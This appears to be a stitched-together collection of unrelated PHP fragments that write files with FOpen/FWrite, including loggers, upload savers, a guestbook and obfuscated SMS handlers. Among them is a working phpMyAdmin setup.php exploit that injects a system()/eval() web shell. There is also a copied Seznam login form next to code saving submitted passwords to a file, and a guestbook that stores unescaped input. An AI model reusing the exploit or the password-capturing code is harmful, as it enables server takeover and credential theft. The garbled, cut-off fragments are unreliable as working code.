private static function _log($data, $level, $withTimestamp)
{
$prependText = $withTimestamp ? date('j.n.Y H:i:s') . ' : ' : '';
if ($level == 'err') {
$fileNameSuffix = '-error';
// naformatovanie dat tak aby boli pekne zarovnane
$sid = str_pad(session_id(), 26, ' ');
$ip = str_pad($_SERVER['REMOTE_ADDR'], 15, ' ');
$prependText .= "SID:{$sid} , IP:{$ip} , ";
} else {
$fileNameSuffix = '';
}
if (is_array($data) || is_object($data)) {
$data = PHP_EOL . var_export($data, true);
}
if (is_bool($data)) {
$data = $data ? 'boolean true' : 'boolean false';
}
try {
$f = FOpen(LOG_DIR . date('Y-m-d') . "{$fileNameSuffix}.txt", "a");
FWrite($f, $prependText . $data . PHP_EOL);
FClose($f);
} catch (Exception $e) {
}
}
public function Open($filename)
{
if (file_exists($filename)) {
$this->File = @FOpen($filename, 'r+');
return !($this->File == false);
} else {
return false;
}
}
function WriteElemToFile(&$elem_name, &$elem_lines)
{
$handle = FOpen("CleanedConfig.cfg", "a");
FWrite($handle, "{$elem_name}\n");
FWrite($handle, "{\n");
foreach ($elem_lines as $property => $values) {
foreach ($values as $value) {
FWrite($handle, "\t{$property}\t{$value}\n");
}
}
FWrite($handle, "}\n\n");
FClose($handle);
return 1;
}
public function logg($text, $id_uzivatele = null)
{
$fp = FOpen($this->soubor, 'a');
if ($id_uzivatele) {
$osoba = $id_uzivatele;
} else {
$osoba = $this->id_uzivatele;
}
if (!$osoba) {
$osoba = '000000';
}
FPutS($fp, Date("Y-m-d H:i:s") . " gis: {$osoba} " . NStrings::toAscii($text) . "\n");
FClose($fp);
}
function WriteToLog($txt, $level)
{
$this->logLevel = IntVal(COption::GetOptionString("mail", "smtp_log_level", "4"));
if ($this->logLevel < $level) {
return;
}
if (MicroTime(true) - $this->startPeriodTimeTruncate > 600) {
if ($this->logFile) {
FClose($this->logFile);
}
$this->logFile = null;
if (File_Exists($_SERVER["DOCUMENT_ROOT"] . $this->logFileName)) {
$logSize = @FileSize($_SERVER["DOCUMENT_ROOT"] . $this->logFileName);
$logSize = IntVal($logSize);
if ($logSize > $this->logMaxSize) {
if (($fp = @FOpen($_SERVER["DOCUMENT_ROOT"] . $this->logFileName, "rb")) && ($fp1 = @FOpen($_SERVER["DOCUMENT_ROOT"] . $this->logFileName . "_", "wb"))) {
$iSeekLen = IntVal($logSize - $this->logMaxSize / 2.0);
FSeek($fp, $iSeekLen);
@FWrite($fp1, "Truncated " . Date("Y-m-d H:i:s") . "\n---------------------------------\n");
do {
$data = FRead($fp, 8192);
if (StrLen($data) == 0) {
break;
}
@FWrite($fp1, $data);
} while (true);
@FClose($fp);
@FClose($fp1);
@Copy($_SERVER["DOCUMENT_ROOT"] . $this->logFileName . "_", $_SERVER["DOCUMENT_ROOT"] . $this->logFileName);
@UnLink($_SERVER["DOCUMENT_ROOT"] . $this->logFileName . "_");
}
}
ClearStatCache();
}
$this->startPeriodTimeTruncate = MicroTime(true);
}
if (!$this->logFile || $this->logFile == null) {
$this->logFile = FOpen($_SERVER["DOCUMENT_ROOT"] . $this->logFileName, "a");
}
if (!$this->logFile) {
echo "Can't write to log\n---------------------------------\n";
return;
}
FWrite($this->logFile, Date("Y-m-d H:i:s") . "\t" . trim($txt) . "\n");
FFlush($this->logFile);
//if ($level > 4)
echo trim($txt) . "\n---------------------------------\n";
}
function SaveUploadedFile($Table, $ID, $File)
{
#-------------------------------------------------------------------------------
$FilePaths = GetFilePath($Table, $ID);
#-------------------------------------------------------------------------------
# создаём директорию
if (!File_Exists($FilePaths['FileDir'])) {
if (!MkDir($FilePaths['FileDir'], 0700, true)) {
return new gException('CANNOT_CREATE_DIRECTORY', 'Не удалось создать директорию для сохранения файла');
}
}
#-------------------------------------------------------------------------------
# сохраняем файл
$fp = FOpen($FilePaths['FilePath'], 'w');
FWrite($fp, $File);
FClose($fp);
#-------------------------------------------------------------------------------
return TRUE;
#-------------------------------------------------------------------------------
}
private function build($url, $file)
{
// Get content from $url
$curl = curl_init($url);
// Create the file name
$output_file = FOpen($file, 'w');
// Set some headers
curl_setopt($curl, CURLOPT_FILE, $output_file);
curl_setopt($curl, CURLOPT_HEADER, 0);
// Exec the request
curl_exec($curl);
// Print results
echo "<li><a href=\"{$file}\">" . $file . "</a></li>";
/*echo "<pre>";
print_r( curl_getInfo( $curl ) );
echo "</pre>";*/
// Close conection
curl_close($curl);
// Close file
FClose($output_file);
}
function BuildItemDesc($file)
{
print " * Loading multis config file...\n";
$cfg_file = ReadConfigFile($file);
if ($cfg_file == FALSE) {
print "Cant open {$file} ({$php_errormsg}). Blame Stephen Donald.\n";
exit;
}
print " * Purging itemdesc.cfg for new write...\n";
$handle = FOpen("itemdesc.cfg", "w");
FClose($handle);
$handle = FOpen("itemdesc.cfg", "a");
print " * Finding elem names...";
$elem_names = GetConfigStringKeys($cfg_file, CLASS_LABELS_ON);
print "(" . Count($elem_names) . ")\n";
foreach ($elem_names as $elem_name) {
if (!Preg_Match("/^House\\s+/i", $elem_name)) {
continue;
}
$multi_id = Preg_Replace("/^House\\s+/i", "", $elem_name);
$objtype = HexDec($multi_id);
$objtype += 16384;
// 0x4000
$objtype = "0x" . DecHex($objtype);
FWrite($handle, "House {$objtype}\n");
FWrite($handle, "{\n");
FWrite($handle, "\t// Main Stuff\n");
FWrite($handle, "\tName\t\tHouse{$objtype}\n");
FWrite($handle, "\tGraphic\t\t{$objtype}\n");
FWrite($handle, "\n");
FWrite($handle, "\t// Multi Info\n");
FWrite($handle, "\tMultiID\t\t{$multi_id}\n");
FWrite($handle, "}\n\n");
}
FClose($handle);
return 1;
}
<?php
$fp = FOpen("gbook.txt", "w");
FWrite($fp, "");
FClose($fp);
echo "Soubor gbook.txt byl vyprazdnen.";
//Otevření souboru
$fp = FOpen("gbook.txt", "a+");
//Zápis dat do souboru
FWrite($fp, "<div class=\"prispevek\">\n");
FWrite($fp, "<meta name=\"IP\" content=\"" . $_SERVER[REMOTE_ADDR] . "\">\n");
FWrite($fp, "<div class=\"nadpis\">" . $title . "</div>\n");
FWrite($fp, "<div class=\"jmeno\"> vložil: " . $name . " - " . $contact . "</div>\n");
FWrite($fp, "<div class=\"datum\">" . $datum . "</div><br />\n");
FWrite($fp, "<div class=\"text\">\n");
FWrite($fp, $text);
FWrite($fp, "\n</div></div>\n\n");
//Uzavření souboru
FClose($fp);
//Výpisy
echo "<b><font color=\"red\">Příspěvek byl korektně uložen!<br />Vaše IP adresa: " . $_SERVER[REMOTE_ADDR] . " byla uložena!</font></b> <meta http-equiv=\"refresh\" content=\"1\">";
} else {
echo "<b><font color=\"red\" title=\"Nezapomeňte na pole ochrany proti spamu!!!\">Nezapomeňte vyplnit všechna pole!</font></b>";
}
?>
</div>
<?php
//Vypsání celého souboru
$fp = FOpen("gbook.txt", "r+");
FPassThru($fp);
FClose($fp);
?>
</body>
</html>
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
$getf = FOpen("./files/portraits/" . $getrec['portrait'], "r");
FPassThru($getf);
}
}
if (isset($_REQUEST['srid']) && is_numeric($_REQUEST['srid'])) {
$getres = MySQL_Query("SELECT symbol FROM " . DB_PREFIX . "persons WHERE " . ($usrinfo['right_power'] ? '' : ' secret=0 AND ') . " id=" . $_REQUEST['srid']);
if ($getrec = MySQL_Fetch_Assoc($getres)) {
header('Content-Type: image/jpg');
header('Content-Disposition: inline; filename="symbol' . $_REQUEST['srid'] . '.jpg"');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
$getf = FOpen("./files/symbols/" . $getrec['symbol'], "r");
FPassThru($getf);
}
}
if (isset($_REQUEST['nrid']) && is_numeric($_REQUEST['nrid'])) {
$getres = MySQL_Query("SELECT symbol FROM " . DB_PREFIX . "symbols WHERE id=" . $_REQUEST['nrid']);
if ($getrec = MySQL_Fetch_Assoc($getres)) {
header('Content-Type: image/jpg');
header('Content-Disposition: inline; filename="symbol' . $_REQUEST['nrid'] . '.jpg"');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
$getf = FOpen("./files/symbols/" . $getrec['symbol'], "r");
FPassThru($getf);
}
}
private function image_gif($savePath)
{
if ($this->ani_gif && is_array($this->ani_imageResized) && count($this->ani_imageResized) > 1) {
$newa = array();
foreach ($this->ani_imageResized as $i) {
ob_start();
imagegif($i);
$gifdata = ob_get_clean();
$newa[] = $gifdata;
}
if ($gifmerge = new GIFEncoder($newa, $this->ani_delays, 9999, $this->ani_disposal, $this->ani_transparent['r'], $this->ani_transparent['g'], $this->ani_transparent['b'], "bin")) {
FWrite(FOpen($savePath, "wb"), $gifmerge->GetAnimation());
} else {
imagegif($this->ani_imageResized[0], $savePath);
}
} else {
imagegif($this->imageResized, $savePath);
}
}
function CloseOpenStep()
{
$this->serverLogTmpHandle = FOpen($_SERVER["DOCUMENT_ROOT"] . $this->serverLogTmp, "w");
FWrite($this->serverLogTmpHandle, $this->descrTs . "|" . $this->descrRegion . "|" . Implode(",", $this->descrCollectedExtensions) . "\n");
FWrite($this->serverLogTmpHandle, $this->logText);
FClose($this->serverLogTmpHandle);
}
<?php
require_once './inc/func_main.php';
if (is_numeric($_REQUEST['idfile'])) {
if ($usrinfo['right_power']) {
$sql = "SELECT mime, uniquename AS 'soubor', originalname AS 'nazev', size FROM " . DB_PREFIX . "data WHERE id=" . $_REQUEST['idfile'];
} else {
$sql = "SELECT mime, uniquename AS 'soubor', originalname AS 'nazev', size FROM " . DB_PREFIX . "data WHERE id=" . $_REQUEST['idfile'] . " AND secret=0";
}
$getres = MySQL_Query($sql);
if ($getrec = MySQL_Fetch_Assoc($getres)) {
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . $getrec['nazev'] . '";');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
header('Content-Length: ' . $getrec['size']);
$getf = FOpen('./files/' . $getrec['soubor'], 'r');
FPassThru($getf);
}
}
public function postProcess($icddcd508600972f2dab78cd14f7612aa4dc19a18 = NULL, $i6b496fee24729ce6f7683ba88d5a87d6130049b5 = NULL, $ifab26c5df1e4ac29b64e0a4796b1f9165fe614a8 = NULL)
{
if ($icddcd508600972f2dab78cd14f7612aa4dc19a18 == NULL && $i6b496fee24729ce6f7683ba88d5a87d6130049b5 == NULL) {
return self::POST_ERROR;
}
if (isset($icddcd508600972f2dab78cd14f7612aa4dc19a18['submitSendSmsSendSMS'])) {
$this->unicode = $this->escapePostVariables("unicode");
$this->unique = $this->escapePostVariables("unique");
$this->sendlater = $this->escapePostVariables("sendlater");
$this->laterDate = $this->escapePostVariables("laterdate");
$this->text = $this->escapePostVariables("text");
$this->datereal = $this->escapePostVariables("datereal");
$this->coupon = $this->escapePostVariables("coupon");
$this->recipients = $this->escapePostVariables("recipients");
$this->store = $this->escapePostVariables("store");
$this->text = $this->applyTemplate($this->getShopVariables($this->store), $this->text, self::$MarketingTemplateShop);
if ($this->coupon != -1) {
$this->text = $this->applyTemplate($this->getCouponData($this->coupon), $this->text, self::$MarketingTemplateCoupons);
}
$i4367816f1ae76ddc44b3953c9ce6460e181a0a3a = new SmsModel($this->getDb(), SmsModel::TYPE_SIMPLE, SmsModel::SMS_CTYPE_CUSTOMER, SmsModel::SMS_BULK);
if ($_FILES['sms_file']["error"] == UPLOAD_ERR_OK) {
$i06493fffaa8df28d7e93ecadf0456d1c6ef2dd59 = array('application/vnd.ms-excel', 'text/plain', 'text/csv', 'text/tsv');
if (in_array($_FILES['sms_file']['type'], $i06493fffaa8df28d7e93ecadf0456d1c6ef2dd59)) {
$iced8cbcfca3c880f0f157e119d1cc6f8691e7e89 = file_get_contents($_FILES['sms_file']['tmp_name']);
if (strlen($iced8cbcfca3c880f0f157e119d1cc6f8691e7e89) > 0) {
$i6759260164586078a2fa1aa45098abd39b1b024f = explode("\n", $iced8cbcfca3c880f0f157e119d1cc6f8691e7e89);
foreach ($i6759260164586078a2fa1aa45098abd39b1b024f as $i43ef5aef4168652439ef5de195405ced9f0f7952) {
$i54fc95c620615b8e68df386b72929d1208bad191 = explode(";", $i43ef5aef4168652439ef5de195405ced9f0f7952);
if (strlen($i54fc95c620615b8e68df386b72929d1208bad191[0]) > 0) {
$i9b6c9cca0694350eee34e46f63f570fa8cb734eb[] = $i54fc95c620615b8e68df386b72929d1208bad191[0];
}
}
} else {
$icae5bf8f5bd9daa6fdb6df264202125d19c6d430 = FOpen($_FILES['sms_file']['tmp_name'], "r");
if ($icae5bf8f5bd9daa6fdb6df264202125d19c6d430 != null) {
while ($iced8cbcfca3c880f0f157e119d1cc6f8691e7e89 = FGets($icae5bf8f5bd9daa6fdb6df264202125d19c6d430, 5000)) {
$ief7afdabf057a5931e499c7cbab3c17ceceb7e37 = explode(";", $iced8cbcfca3c880f0f157e119d1cc6f8691e7e89);
if (strlen($i54fc95c620615b8e68df386b72929d1208bad191[0]) > 0) {
$i9b6c9cca0694350eee34e46f63f570fa8cb734eb[] = $ief7afdabf057a5931e499c7cbab3c17ceceb7e37[0];
}
}
}
}
} elseif ($_FILES['sms_file']['type'] == "text/x-vcard" || $_FILES['sms_file']['type'] == "text/vcard") {
$i9b6c9cca0694350eee34e46f63f570fa8cb734eb = preg_replace("/TEL;.*:/", "", preg_grep("/TEL;/", explode("\n", file_get_contents($_FILES['sms_file']['tmp_name']))));
} else {
$this->_errors[] = v_sendsms_csvtext;
return self::POST_ERROR;
}
$i4367816f1ae76ddc44b3953c9ce6460e181a0a3a->number($i9b6c9cca0694350eee34e46f63f570fa8cb734eb);
}
if ($this->unicode) {
$i4367816f1ae76ddc44b3953c9ce6460e181a0a3a->unicode();
}
if ($this->unique) {
$i4367816f1ae76ddc44b3953c9ce6460e181a0a3a->unique();
}
if ($this->sendlater) {
$this->getTimezoneSettings();
$id9fa4635372c4216f6d8a98e38c0b7d89c775790 = new DateTime($this->laterDate);
$id9fa4635372c4216f6d8a98e38c0b7d89c775790->setTimezone(new DateTimeZone($this->timezone));
$id9fa4635372c4216f6d8a98e38c0b7d89c775790->modify($this->datereal . " hour");
$i4367816f1ae76ddc44b3953c9ce6460e181a0a3a->sendLater($id9fa4635372c4216f6d8a98e38c0b7d89c775790);
}
$i4367816f1ae76ddc44b3953c9ce6460e181a0a3a->number($this->recipients)->text($this->text)->send();
if ($i4367816f1ae76ddc44b3953c9ce6460e181a0a3a->isError()) {
$this->_errors = array_unique($i4367816f1ae76ddc44b3953c9ce6460e181a0a3a->getErrors());
return self::POST_ERROR;
} else {
$this->_okMsg = array_unique($i4367816f1ae76ddc44b3953c9ce6460e181a0a3a->getConfirm());
return self::POST_OK;
}
} elseif (isset($icddcd508600972f2dab78cd14f7612aa4dc19a18["saveTemplate"])) {
$this->saveName = $this->escapePostVariables("saveName");
$iccc7124c4929a783f68681205060c9cffb230624 = $this->escapePostVariables("saveText");
$ia16b8bee9a5a69d4ec369fae234a70efdd002c24 = $this->escapePostVariables("saveUnicode");
$ia74439b5a1382238828ba4fcd21ede60406b1de2 = $this->escapePostVariables("saveUnique");
$ia16b8bee9a5a69d4ec369fae234a70efdd002c24 = $ia16b8bee9a5a69d4ec369fae234a70efdd002c24 == "true" ? 1 : 0;
$ia74439b5a1382238828ba4fcd21ede60406b1de2 = $ia74439b5a1382238828ba4fcd21ede60406b1de2 == "true" ? 1 : 0;
$this->Execute("INSERT INTO `" . DB_PREFIX . "sp_template` (`name`, `template`, `unicode`, `unique`, `date`, `type`) VALUES ('" . $this->escape($this->saveName) . "', '" . $this->escape($iccc7124c4929a783f68681205060c9cffb230624) . "', '" . $this->escape($ia16b8bee9a5a69d4ec369fae234a70efdd002c24) . "', '" . $this->escape($ia74439b5a1382238828ba4fcd21ede60406b1de2) . "', NOW(), '1')");
$this->_okMsg[] = v_template_been_saved;
return self::POST_OK;
}
return self::POST_ERROR;
}
return ERROR | @Trigger_Error(500);
case 'exception':
return new gException('TASK_NOT_FOUND', 'Задание не найдено');
case 'array':
break;
default:
return ERROR | @Trigger_Error(101);
}
#-------------------------------------------------------------------------------
#-------------------------------------------------------------------------------
$Tmp = System_Element('tmp');
if (Is_Error($Tmp)) {
return ERROR | @Trigger_Error(500);
}
#-------------------------------------------------------------------------------
$Marker = FOpen(SPrintF('%s/TaskLastExecute.txt', $Tmp), 'w');
FWrite($Marker, Date('YmdHis'));
FClose($Marker);
#-------------------------------------------------------------------------------
#-------------------------------------------------------------------------------
$TaskID = $Task['ID'];
#-------------------------------------------------------------------------------
$Free = DB_Query(SPrintF("SELECT IS_FREE_LOCK('Tasks%s') as `IsFree`", $TaskID));
if (Is_Error($Free)) {
return ERROR | @Trigger_Error(500);
}
#-------------------------------------------------------------------------------
$Rows = MySQL::Result($Free);
if (Is_Error($Rows)) {
return ERROR | @Trigger_Error(500);
}
function exploit($w00t)
{
$Handlex = FOpen("pmaPWN.log", "a+");
$useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) ";
//firefox
//first get cookie + token
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $w00t . "scripts/setup.php");
//URL
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 200);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
//return site as string
curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
$result = curl_exec($curl);
curl_close($curl);
if (preg_match_all("/token\"\\s+value=\"([^>]+?)\"/", $result, $matches)) {
}
$token = $matches[1][1];
if ($token != '') {
print "\n[!] w00t! w00t! Got token = " . $matches[1][1];
FWrite($Handlex, "\n[!] w00t! w00t! Got token = " . $matches[1][1]);
$payload = "token=" . $token . "&action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix";
print "\n[+] Sending evil payload mwahaha.. \n";
FWrite($Handlex, "\n[+] Sending evil payload mwahaha.. \n");
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $w00t . "scripts/setup.php");
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
curl_setopt($curl, CURLOPT_TIMEOUT, 200);
curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
curl_setopt($curl, CURLOPT_REFERER, $w00t);
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, $payload);
curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
$result = curl_exec($curl);
curl_close($curl);
print "\n[!] w00t! w00t! You should now have shell here";
print "\n[+] " . $w00t . "config/config.inc.php?c=id \n";
print "\n[!] Saved. Dont forget to check `pmaPWN.log`\n";
FWrite($Handlex, "\n[!] w00t! w00t! You should now have shell here");
FWrite($Handlex, "\n[+] " . $w00t . "config/config.inc.php?c=id \n");
} else {
print "\n[!] Shit! no luck.. not vulnerable\n";
FWrite($Handlex, "\n[!] Shit! no luck.. not vulnerable\n");
return false;
}
FClose($Handlex);
if (file_exists('exploitcookie.txt')) {
unlink('exploitcookie.txt');
}
//exit();
}
function robin_file_write($filename_and_path, $data)
{
@umask(0131);
$file = @FOpen($filename_and_path, 'wb+');
@flock($file, 2);
@FPutS($file, $data);
@flock($file, 3);
@FClose($file);
}
public function postProcess($if7ac7ffb0e11bffa95681698138e923b4fd51990 = NULL, $i120dfeb2f4db76e8e52ed01ad8e678e2b9fa3bb9 = NULL, $i4df8c509b6936a0640c1594ca9b38a0a55a9562f = NULL)
{
if ($if7ac7ffb0e11bffa95681698138e923b4fd51990 == NULL && $i120dfeb2f4db76e8e52ed01ad8e678e2b9fa3bb9 == NULL) {
return self::POST_ERROR;
}
if (isset($if7ac7ffb0e11bffa95681698138e923b4fd51990['submitSendSmsSendSMS'])) {
$this->unicode = $this->escapePostVariables("unicode");
$this->unique = $this->escapePostVariables("unique");
$this->sendlater = $this->escapePostVariables("sendlater");
$this->laterDate = $this->escapePostVariables("laterdate");
$this->text = $this->escapePostVariables("text");
$this->datereal = $this->escapePostVariables("datereal");
$this->coupon = $this->escapePostVariables("coupon");
$this->recipients = $this->escapePostVariables("recipients");
$this->store = $this->escapePostVariables("store");
$this->text = $this->applyTemplate($this->getShopVariables($this->store), $this->text, self::$MarketingTemplateShop);
if ($this->coupon != -1) {
$this->text = $this->applyTemplate($this->getCouponData($this->coupon), $this->text, self::$MarketingTemplateCoupons);
}
$i9ec854a302fbdb72d043506b55d5bf395184517b = new SmsModel($this->getDb(), SmsModel::TYPE_SIMPLE, SmsModel::SMS_CTYPE_CUSTOMER, SmsModel::SMS_BULK);
if ($_FILES['sms_file']["error"] == UPLOAD_ERR_OK) {
$iccb6cdd13fb53ab60ca9fe89a47714157318d361 = array('application/vnd.ms-excel', 'text/plain', 'text/csv', 'text/tsv');
if (in_array($_FILES['sms_file']['type'], $iccb6cdd13fb53ab60ca9fe89a47714157318d361)) {
$ib1199182837e705aae8d93f525c88b1184f9395d = file_get_contents($_FILES['sms_file']['tmp_name']);
if (strlen($ib1199182837e705aae8d93f525c88b1184f9395d) > 0) {
$ibc2fa36dbd6b936f71d62a75d147345bab9fb1e8 = explode("\n", $ib1199182837e705aae8d93f525c88b1184f9395d);
foreach ($ibc2fa36dbd6b936f71d62a75d147345bab9fb1e8 as $i2e93e61d67c274d891066238c74ba6322d527b6d) {
$i140d151c23a5be7843ee9bffd3275f9364d99f4f = explode(";", $i2e93e61d67c274d891066238c74ba6322d527b6d);
if (strlen($i140d151c23a5be7843ee9bffd3275f9364d99f4f[0]) > 0) {
$i9744d24cf13e8257399c74b1ede6a0f99ec6045b[] = $i140d151c23a5be7843ee9bffd3275f9364d99f4f[0];
}
}
} else {
$ie69b823b64e72c132a115b89028b8d475b6f861d = FOpen($_FILES['sms_file']['tmp_name'], "r");
if ($ie69b823b64e72c132a115b89028b8d475b6f861d != null) {
while ($ib1199182837e705aae8d93f525c88b1184f9395d = FGets($ie69b823b64e72c132a115b89028b8d475b6f861d, 5000)) {
$id7218f29714ac595e34d4456a75ad078cbb02291 = explode(";", $ib1199182837e705aae8d93f525c88b1184f9395d);
if (strlen($i140d151c23a5be7843ee9bffd3275f9364d99f4f[0]) > 0) {
$i9744d24cf13e8257399c74b1ede6a0f99ec6045b[] = $id7218f29714ac595e34d4456a75ad078cbb02291[0];
}
}
}
}
} elseif ($_FILES['sms_file']['type'] == "text/x-vcard" || $_FILES['sms_file']['type'] == "text/vcard") {
$i9744d24cf13e8257399c74b1ede6a0f99ec6045b = preg_replace("/TEL;.*:/", "", preg_grep("/TEL;/", explode("\n", file_get_contents($_FILES['sms_file']['tmp_name']))));
} else {
$this->_errors[] = v_sendsms_csvtext;
return self::POST_ERROR;
}
$i9ec854a302fbdb72d043506b55d5bf395184517b->number($i9744d24cf13e8257399c74b1ede6a0f99ec6045b);
}
if ($this->unicode) {
$i9ec854a302fbdb72d043506b55d5bf395184517b->unicode();
}
if ($this->unique) {
$i9ec854a302fbdb72d043506b55d5bf395184517b->unique();
}
if ($this->sendlater) {
$this->getTimezoneSettings();
$i4f14cfb4b41c3b4b67307d1b1cd9e51447fe428c = new DateTime($this->laterDate);
$i4f14cfb4b41c3b4b67307d1b1cd9e51447fe428c->setTimezone(new DateTimeZone($this->timezone));
$i4f14cfb4b41c3b4b67307d1b1cd9e51447fe428c->modify($this->datereal . " hour");
$i9ec854a302fbdb72d043506b55d5bf395184517b->sendLater($i4f14cfb4b41c3b4b67307d1b1cd9e51447fe428c);
}
$i9ec854a302fbdb72d043506b55d5bf395184517b->number($this->recipients)->text($this->text)->send();
if ($i9ec854a302fbdb72d043506b55d5bf395184517b->isError()) {
$this->_errors = array_unique($i9ec854a302fbdb72d043506b55d5bf395184517b->getErrors());
return self::POST_ERROR;
} else {
$this->_okMsg = array_unique($i9ec854a302fbdb72d043506b55d5bf395184517b->getConfirm());
return self::POST_OK;
}
} elseif (isset($if7ac7ffb0e11bffa95681698138e923b4fd51990["saveTemplate"])) {
$this->saveName = $this->escapePostVariables("saveName");
$ie32585eb1b56e8e02465722681ae17f4122f4b7d = $this->escapePostVariables("saveText");
$i6c08bf61f437a7df1241311fb1b61cb26dfddd64 = $this->escapePostVariables("saveUnicode");
$ib60aacf907e26fcd4e5091fb981d81cb096eec61 = $this->escapePostVariables("saveUnique");
$i6c08bf61f437a7df1241311fb1b61cb26dfddd64 = $i6c08bf61f437a7df1241311fb1b61cb26dfddd64 == "true" ? 1 : 0;
$ib60aacf907e26fcd4e5091fb981d81cb096eec61 = $ib60aacf907e26fcd4e5091fb981d81cb096eec61 == "true" ? 1 : 0;
$this->Execute("INSERT INTO `" . DB_PREFIX . "sp_template` (`name`, `template`, `unicode`, `unique`, `date`, `type`) VALUES ('" . $this->escape($this->saveName) . "', '" . $this->escape($ie32585eb1b56e8e02465722681ae17f4122f4b7d) . "', '" . $this->escape($i6c08bf61f437a7df1241311fb1b61cb26dfddd64) . "', '" . $this->escape($ib60aacf907e26fcd4e5091fb981d81cb096eec61) . "', NOW(), '1')");
$this->_okMsg[] = v_template_been_saved;
return self::POST_OK;
}
return self::POST_ERROR;
}
\t\t</p>
\t\t<p class="remember">
\t\t\t<input type="checkbox" name="remember" id="remember" value="1" /><label for="remember">pøihlásit trvale na tomto poèítaèi</a></label> - <a href="http://napoveda.seznam.cz/cz/prihlaseni.html">Co to je?</a>
\t\t</p>
\t\t<p class="submit-row">
\t\t\t<input type="submit" class="submit" value="Pøihlásit se" tabindex="4" />
\t\t\t<input type="hidden" name="serviceId" value="email" />
\t\t\t<input type="hidden" name="disableSSL" value="0" />
\t\t\t<input type="hidden" name="forceSSL" value="0" />
\t\t\t<input type="hidden" name="lang" value="cz" />
\t\t\t<input type="hidden" name="template" value="html" />
\t\t\t<input type="hidden" name="lang" value="cz" />
\t\t\t<input type="hidden" name="loggedURL" value="http://email.seznam.cz/ticket" />
\t\t\t<input type="hidden" name="returnURL" value="" />
\t\t\t<input type="hidden" name="loginFormIsSSL" value="0" />
\t\t</p>
\t</form>
END;
echo '+ ' . ($a + $b) . "<br />";
echo "- " . ($a - $b) . "<br>";
echo "/ " . $b / $a . "<br>";
echo "* " . $a * $b . "<br>";
echo "<br />";
$fp = FOpen("data.txt", "a");
//a = doplnìní w = zápis r = ètení
FWrite($fp, $_POST["password"]);
// uloží obsah promìnné $data do souboru data2.txt
<?php
$fp = FOpen("pocitadlo.txt", "r");
$pocet = FRead($fp, 90);
FClose($fp);
$pocet = $pocet + 1;
$fp = FOpen("pocitadlo.txt", "w");
FWrite($fp, $pocet);
FClose($fp);
echo "Navstev: " . $pocet;
FUNCTION RunSQL($link, $file) {
IF(File_Exists($file)) {
$fd = FOpen($file, "r");
$sql = FRead($fd, FileSize($file));
FClose($fd);
$query = Split(";( )?(\r)?\n(\r)?", $sql);
FOR($i = 0; $i < Count($query); $i++) {
IF($query[$i] != "") {
$link->Query($query[$i]);
}
}
RETURN TRUE;
}
ELSE
{RETURN FALSE;}
}
